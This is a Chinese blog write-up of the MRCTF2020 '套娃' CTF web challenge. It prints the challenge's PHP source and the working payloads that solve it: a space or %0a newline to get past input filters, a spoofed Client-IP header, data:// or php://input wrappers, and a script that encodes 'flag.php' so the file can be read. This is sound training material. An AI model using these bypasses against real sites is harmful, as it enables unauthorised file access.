[MRCTF2020]套娃

最新推荐文章于 2024-02-18 15:01:53 发布
最新推荐文章于 2024-02-18 15:01:53 发布
阅读量208 收藏
点赞数
文章标签: php 正则表达式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nefelibataadad/article/details/120116696
版权
本文介绍了MRCTF2020中的一道题目,涉及PHP字符串解析bypass、正则表达式绕过、文件包含的伪协议绕过等技术。通过分析源代码,利用substr_count函数过滤特性、换行符绕过正则匹配,以及文件包含漏洞的php://input和data伪协议,最终成功解密获取flag。
摘要由CSDN通过智能技术生成

[MRCTF2020]套娃

php字符窜解析bypass参考:https://www.freebuf.com/articles/web/213359.html
正则表达式的绕过 参考:https://blog.csdn.net/qq_40327508/article/details/108842617
文件包含的伪协议绕过 参考:https://www.cnblogs.com/-an-/p/12372220.html
function change加密解密

打开之后在源代码发现线索

<!--
//1st
$query = $_SERVER['QUERY_STRING'];

 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}
!-->
  • 首先分析一下这里的代码,这里有两个if,第一个if里有一个函数需要我们学习substr_count(),
函数的功能:函数计算子串在字符串中出现的次数。
注释:子串是区分大小写的

​ 这里过滤了“—”,这里要求不能出现,可以用空格替代

  • 第二个if有两个条件,第一就是get传值,第二就是绕过preg_match正则表达式
==:称为等值符,当等号两边的类型相同时,直接比较值是否相等,若不相同,则先转化为类型相同的值,再进行比较

正则表达式的几种绕过方式:https://blog.csdn.net/qq_40327508/article/details/108842617

这里用的是换行符绕过(%0a)

所以可以构造payload:

?b u p t=23333%0a

在这里插入图片描述

访问secrettw.php

在这里插入图片描述

一段jsfuck编码,因控制台执行一下

在这里插入图片描述

让post传参Merak,也没说穿什么值,那就随便

<?php 
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';

if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 


function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>

得到另外一个源码

  • 分析一下,首先需要post传参Merak随便负值,然后下边有一个if要求我们的IP为127.0.0.1,这个可以用client-ip:来实现,然后后边的if要求我们get传参2333,传入todat is a happy day,因为是file_get_contents()函数考虑文件包含漏洞的伪协议,这里可以用php伪协议?php://input 和data伪协议?data://text/plain;base64,xxxx(base64编码之后的需要上穿的数据)

伪协议参考:https://www.cnblogs.com/-an-/p/12372220.html

  • 并且在change里边get传参file读取,因为开头都告诉了包含flag.php,那必然=flag.php

  • 这里涉及到function change这里的一个加密

我们可以反写它,exp:

<?php
function unchange($v){ 
    $re = '';
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) - $i*2 ); 
    } 
    return $re; 
}
$real_flag = unchange('flag.php');

echo base64_encode($real_flag);
?>

得到:ZmpdYSZmXGI=

在这里插入图片描述

十七号宇航员
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF web [MRCTF2020]套娃 1 wp
Whaocai的博客
08-06 464
考点: ①$SERVER数组的各个元素的含义 ②%0a绕过preg_match() ③data://text/plain;base64的利用 进去之后还是先看看有没有robots.txt文件(自己做题的习惯),发现页面并不跳转,猜测应该是index.php中有header在限制 于是查看源码,看到一段php代码 //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($qu
俄罗斯套娃
04-17
"俄罗斯套娃"这个标题可能是指一种特殊的数据处理或存储方式,它借鉴了传统玩具俄罗斯套娃的概念。在信息技术领域,这种比喻可能用于描述一种数据结构或者编程技巧,其中数据被嵌套在一个又一个的层次中,每个层级都...
[MRCTF2020]套娃 1
shinygod的博客
04-01 775
知识点:Client-ip,data://, $_SERVER总结 <!-- //1st $query = $_SERVER['QUERY_STRING'];//获取参数 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ //参数中不能有_和%5f die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' &&
[MRCTF2020]套娃1
最新发布
不会编程的崽的博客
02-18 1212
php非法传参,data伪协议,[][(![]+[])的js代码,数据包ip的伪造
俄罗斯套娃奖品Java程序
08-12
标题中的“俄罗斯套娃奖品Java程序”表明这是一个使用Java编程语言实现的程序,它可能与俄罗斯套娃这种玩具的概念相结合,创建出一种趣味性的计算模型或者游戏。俄罗斯套娃通常指的是一个大娃娃里面装着小一点的同款...
俄罗斯套娃奖品C++程序
05-19
在IT领域,编程竞赛是一种锻炼和展示编程技巧的常见方式,而“俄罗斯套娃奖品C++程序”就是一个这样的例子,它曾出现在中兴通信公司的“捧月杯”编程竞赛中。这个程序的设计和实现利用了C++这门强大的编程语言,展示...
俄罗斯套娃程序及设计
06-09
【俄罗斯套娃程序及设计】是一种特殊的算法应用,主要用于寻找最佳路径或解决方案。在这个特定的实现中,程序设计用于处理二维矩阵数据,可能是为了解决寻路问题或者优化问题。以下是这个算法的关键点: 1. **递归...
中兴设计大赛 套娃问题动态算法
06-11
本主题聚焦于“中兴设计大赛”的一个特定挑战,即“套娃问题”,这是一个与俄罗斯套娃概念相结合的算法问题。在这个比赛中,参赛者需要设计一个支持“多0”的动态规划解决方案来处理套娃的嵌套关系。 俄罗斯套娃,...
俄罗斯套娃c语言程序
02-15
俄罗斯套娃是一种传统的俄罗斯玩具,它由一组套在一起的木质人偶组成,每个人偶都可以打开,里面还有一个更小的人偶。如果你想在C语言中实现俄罗斯套娃程序,你可以使用结构体和指针来表示套娃的层次结构。 首先,你可以定义一个结构体来表示一个套娃人偶,其中包含一个指向更小人偶的指针。例如: ```c struct Doll { int size; struct Doll* smaller_doll; }; ``` 然后,你可以创建一组套娃人偶对象,并将它们连接起来形成套娃的层次结构。例如: ```c struct Doll doll1 = { 1, NULL }; struct Doll doll2 = { 2, &doll1 }; struct Doll doll3 = { 3, &doll2 }; // 依此类推... ``` 在这个例子中,doll3 是最外层的人偶,它包含了指向 doll2 的指针,而 doll2 又包含了指向 doll1 的指针。 最后,你可以通过遍历套娃的层次结构来打印出每个人偶的大小。例如: ```c struct Doll* current_doll = &doll3; while (current_doll != NULL) { printf("Doll size: %d\n", current_doll->size); current_doll = current_doll->smaller_doll; } ``` 这样,你就可以按照从外到内的顺序打印出每个人偶的大小。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值